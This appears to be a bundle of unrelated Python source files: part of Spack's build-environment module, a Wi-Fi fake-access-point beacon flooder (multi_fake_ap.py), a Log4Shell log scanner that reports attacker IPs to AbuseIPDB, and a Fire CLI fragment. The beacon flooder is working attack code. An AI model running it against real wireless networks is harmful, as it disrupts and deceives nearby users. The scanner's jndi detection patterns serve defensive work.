# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
Returns:
list of str: standard arguments that would be used if this
package were a CMakePackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for cmake
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
Returns:
list of str: standard arguments that would be used if this
package were a MesonPackage instance.
Args:
pkg (PackageBase): package under consideration
Returns:
list of str: arguments for meson
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
implicit_rpaths = pkg.compiler.implicit_rpaths()
if implicit_rpaths:
build_env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
':'.join(implicit_rpaths))
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
# Do not create a full ChildError from this, it's not an error
# it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
# If returns a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
Any subclass of InstallError will be annotated by Spack wtih a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
# The error happened in some external executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
# The error happened in in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
|
multi_fake_ap.py
|
import os
import sys
os.system("clear")
import pyfiglet
print (chr(27)+"[36m")
banner = pyfiglet.figlet_format("Multi Fake AP ")
print (banner)
print (" Author : Rahat Khan Tusar(RKT)")
print (" Github : https;//github.com/r3k4t")
from scapy.all import *
from threading import Thread
from faker import Faker
resp =input("""\nPlease,select your option :
1.Wireless Acess Points(APs) 802.11 ===> 2
2.Wireless Acess Points(APs) 802.11 ===> 4
3.Wireless Acess Points(APs) 802.11 ===> 5
4.Wireless Acess Points(APs) 802.11 ===> 10\n """)
print ("You have selected option :",resp)
if resp == '1':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 2
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '2':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 4
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '3':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
# ESS+privacy to appear as secured on some devices
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 5
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
elif resp == '4':
def send_beacon(ssid,mac,infinite=True):
dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac)
beacon = Dot11Beacon(cap="ESS+privacy")
essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, inter=0.1, loop=1, iface=iface, verbose=0)
if __name__ == "__main__":
# number of access points
rkt_ap = 10
interface = input("Enter interface(Example:wlp2s0,wlan0,enp0s3 etc) : ")
os.system("sudo airmon-ng start {}".format(interface))
iface = input("Enter interface(Example:wlp2s0mon,wlan0mon,enp0s3mon etc) : ")
# generate random SSIDs and MACs
faker = Faker()
ssids_macs = [ (faker.name(), faker.mac_address()) for i in range(rkt_ap) ]
for ssid, mac in ssids_macs:
Thread(target=send_beacon, args=(ssid, mac)).start()
|
jndiRep.py
|
#!/usr/bin/env python
from shutil import get_terminal_size
from time import time, ctime
import subprocess
import threading
import requests
import argparse
import base64
import json
import sys
import re
import os
paths = []
findings = []
WIDTH = get_terminal_size().columns
RED = "\x1b[31m"
GREEN = "\x1b[32m"
CYAN = "\x1b[36m"
RESET = "\x1b[0m"
BOLD = "\x1b[1m"
IP_RE = re.compile(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')
LOG_RE = re.compile(r'\d+\s(/.*\.log\.*)')
FILTER = [b"jndiRep"]
url = 'https://api.abuseipdb.com/api/v2/report'
class JNDI:
def __init__(self, path: str, lines: list):
self.path = path
self.lines = lines
def prompt():
print(f"{RED} __ {CYAN} __ __ ______ {RESET}")
print(f"{RED} |__|{CYAN}.-----.--| |__| __ \.-----.-----.{RESET}")
print(f"{RED} | |{CYAN}| | _ | | <| -__| _ |{RESET}")
print(f"{RED} | |{CYAN}|__|__|_____|__|___|__||_____| __|{RESET}")
print(f"{RED}|___|{CYAN} |__| {RESET}")
print(f"{RED} (c) 2021{GREEN} - Jakob Schaffarczyk{RESET}\n")
def error(msg: str):
msg = msg.replace("\n", "\n ")
print(f"{RED}[!]{RESET} {msg}")
sys.exit(1)
def info(msg: str):
msg = msg.replace("\n", "\n ")
print(f"{GREEN}[i]{RESET} {msg}")
def progress(size: int):
prog = round(50/size*(size-len(paths)))
msg = f"Progress: [{prog*'#'}{(50-prog)*' '}] {size-len(paths)}/{size}"
msg += (WIDTH-len(msg)) * ' '
print(msg, end='\r')
def decode_payload(log: str) -> bytes:
payload = b""
if b"Base64" in log:
payload = base64.decodebytes(log.split(b"Base64/")[1].split(b"}")[0])
elif b"${lower" in log or b"${upper" in log:
log = b'$' + b'$'.join(log.split(b"$")[1:])[:-1]
payload = re.sub(r'\$\{\w+:(\w+)\}', r"\1", log.decode()).encode()
return payload
def run(size: int, grep: str):
while len(paths) != 0:
path = paths.pop()
progress(size)
try:
scan_file(path, grep)
except FileNotFoundError:
pass
except Exception as e:
error(
str(e) + "\nPlease file an issue at https://github.com/js-on/jndiRep/issues")
def scan_docker(grep: str):
ps = subprocess.check_output(["docker", "ps"]).splitlines()[1:]
container_ids = [container.decode().split(" ")[0] for container in ps]
container_names = [container.decode().split(" ")[-1] for container in ps]
grep = grep.encode()
cnt = 1
for cid, cname in zip(container_ids, container_names):
info(f"Scanning #{cid} - ({cnt}/{len(container_ids)})")
res = subprocess.check_output(
["docker", "logs", cid], stderr=subprocess.DEVNULL)
res = res.splitlines()
log = []
for line in res:
if grep in line:
for filter in FILTER:
if filter in line:
return
t = line.strip()
payload = decode_payload(t)
if payload != b"":
t += b"\nPayload: " + payload
log.append(t)
if len(log) != 0:
findings.append(JNDI(path=f"{cname}", lines=log))
cnt += 1
def scan_log(jobs: int, grep: str):
global paths
info("Scanning system with lsof")
data = subprocess.check_output(
["lsof"], stderr=subprocess.DEVNULL).splitlines()
paths = [line for line in data if b".log" in line]
paths = [re.findall(LOG_RE, p.decode())[0] for p in paths]
paths = list(set(paths))
size = len(paths)
if size < jobs:
jobs = size
procs = []
info(
f"Found {size} log files.\nSpawning {jobs} threads\nStart at {ctime(time())}")
for i in range(jobs):
procs.append(threading.Thread(target=run, args=(size, grep)))
for proc in procs:
proc.start()
for proc in procs:
proc.join()
print()
info(f"Stop at {ctime(time())}")
def scan_directory(directory: str, jobs: int, grep: str):
for root, _, files in os.walk(directory):
for name in files:
fname = os.path.join(root, name)
paths.append(fname)
procs = []
size = len(paths)
if size < jobs:
jobs = size
info(f"Spawning {jobs} threads\nStart at {ctime(time())}")
for i in range(jobs):
procs.append(threading.Thread(target=run, args=(size, grep)))
for proc in procs:
proc.start()
for proc in procs:
proc.join()
print()
info(f"Stop at {ctime(time())}")
def scan_file(path: str, grep: str):
log = []
with open(path, "rb") as f:
grep = grep.encode()
for line in f:
if grep in line:
for filter in FILTER:
if filter in line:
return
t = line.strip()
payload = decode_payload(t)
if payload != b"":
t += b"\nPayload: " + payload
log.append(t)
if len(log) != 0:
findings.append(JNDI(path=path, lines=log))
def write_findings(output: str):
print()
if output.endswith(".json"):
info("Store findings in JSON format")
data = {}
for finding in findings:
data[finding.path] = [line.decode() for line in finding.lines]
json.dump(data, open(output, "w"), indent=4)
elif output.endswith(".csv"):
info("Store findings in CSV format\nInfo: \"|\" is used as separator!")
with open(output, "w") as f:
f.write("File|Log|Payload\n")
for finding in findings:
for line in finding.lines:
line = line.decode()
if "\nPayload: " in line:
payload = line.split("\nPayload: ")[1]
line = line.split("\nPayload: ")[0]
else:
payload = ""
t = f"{finding.path}|{line}|{payload}\n"
f.write(t)
else:
with open(output, "w") as f:
for finding in findings:
f.write(f"{finding.path}\n")
for line in finding.lines:
# print(line)
f.write(f"{line.decode()}\n")
f.write("\n")
info(f"Findings written to {output}")
def print_findings():
for finding in findings:
print(f"\n{BOLD}=== {finding.path} ==={RESET}")
for log in finding.lines:
try:
log = log.decode()
ips = IP_RE.findall(log)
for ip in ips:
log = log.replace(ip, f"{GREEN}{ip}{RESET}")
log = log.replace("Payload", f"{RED}Payload{RESET}")
print(log, end="\n\n")
except:
print(log, end="\nn")
def report(api_key: str, include_logs: bool, comment: str, dedup: bool):
headers = {
"Accept": "application/json",
"Key": api_key
}
ips = []
for finding in findings:
for line in finding.lines:
line = line.decode()
msg = comment
# ip = line.split(" ")[0]
try:
ip = IP_RE.findall(line)[0]
except:
continue
# Deduplication of reports
if dedup:
if ip in ips:
continue
else:
ips.append(ip)
if include_logs:
log = line[line.index("["):].split("\nPayload: ")[0]
msg += " - " + log
data = {
"ip": ip,
"categories": "21",
"comment": msg
}
res = requests.request(
method='POST', url=url, headers=headers, params=data)
if res.status_code // 100 == 4:
error(res.text)
else:
info(res.text)
def main():
prompt()
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--api-key",
type=str, help="AbuseIPDB Api Key")
ap.add_argument("-d", "--directory", type=str, help="Directory to scan")
ap.add_argument("-f", "--file", type=str, help="File to scan")
ap.add_argument("-l", "--logs", action="store_true",
help="Use `lsof` to find all .log files and scan them")
ap.add_argument("-D", "--docker", action="store_true",
help="Inspect running containers and scan for log4j activity")
ap.add_argument("-g", "--grep", type=str,
help="Custom word to grep for", default="jndi")
ap.add_argument("-i", "--ignore", type=str, default="",
help="Custom words to ignore (grep -v)")
ap.add_argument("-o", "--output", type=str,
help="File to store results. stdout if not set. Use .csv|.json extension for automatic data formatting", default=None)
ap.add_argument("-t", "--threads", type=int,
help="Number of threads to start. Default is 4", default=4)
ap.add_argument("-r", "--report", action="store_true",
help="Report IPs to AbuseIPDB with category 21 (malicious web request)", default=False)
ap.add_argument("-c", "--comment", type=str, help="Comment sent with your report",
default="Request related to CVE-2021-44228")
ap.add_argument("-I", "--include-logs", action="store_true", default=False,
help="Include logs in your report. PII will NOT be stripped of!!!")
ap.add_argument("--no-dedup", action="store_true", default=False,
help="If set, report every occurrence of IP. Default: Report only once.")
args = ap.parse_args(sys.argv[1:])
if not os.getuid() == 0:
error("jndiRep must be run as superuser")
if args.report:
if not args.api_key:
error("Api Key is required. (-a, --api-key)")
if args.ignore:
for filter in args.ignore.split(","):
FILTER.append(filter.encode())
if args.logs:
scan_log(args.threads, args.grep)
elif args.docker:
scan_docker(args.grep)
elif args.directory:
scan_directory(os.path.join(os.getcwd(), args.directory),
args.threads, args.grep)
elif args.file:
scan_file(os.path.join(args.file), args.grep)
else:
error("Either (-f) or (-d) or (-l) is required.")
file_cnt = len(findings)
log_cnt = sum([len(finding.lines) for finding in findings])
info(f"Found {log_cnt} log entries in {file_cnt} files")
if args.output:
write_findings(os.path.join(os.getcwd(), args.output))
else:
print_findings()
if args.report:
report(args.api_key, args.include_logs,
args.comment, not args.no_dedup)
if __name__ == "__main__":
main()
|
fire_cli.py
|
import sys
import threading
import uuid
from io import StringIO
import fire
from dukepy.fire.fire_root import Root
from dukepy.traces import print_exception_traces
from dukepy.fire.fire_command import FireCommand
fire_threads = []
def db_fire_cmd(cmd, source):
def act():
try:
req = FireCommand(cmd=cmd, source=source)
req.save()
except Exception as e:
print_exception_traces(e)
t = threading.Thread(target=act())
t.start()
def main():
if len(sys.argv) > 1:
args = ""
for arg in sys.argv[1:]:
args += " " + arg
try:
db_fire_cmd(args, "cli")
fire.Fire(Root, args)
except Exception as e:
print_exception_traces(e)
Root.cmd_history.append(args)
else:
print("no args...")
# while True:
# cmd = input()
# fire.Fire(Root, cmd)
# Root.cmd_history.append(cmd)
pass
def fire_task_wrapper(cmd, emit, req_id=None):
class TeeIn(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stdin': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stdin__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
class TeeOut(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stdout': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stdout__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
class TeeErr(StringIO):
def write(self, s):
# print("fire out" + str(s))
try:
emit('fireout', {'stderr': s, 'req_id': req_id})
# StringIO.write(self, s)
# sys.__stderr__.write(s)
except Exception as e:
# print_exception_traces(e)
pass
# @processify
def fire_task(command):
db_fire_cmd(command, "websocket")
# Save everything that would otherwise go to stdout.
stdin = TeeIn()
sys.stdin = stdin
stdout = TeeOut()
sys.stdout = stdout
stderr = TeeErr()
sys.stderr = stderr
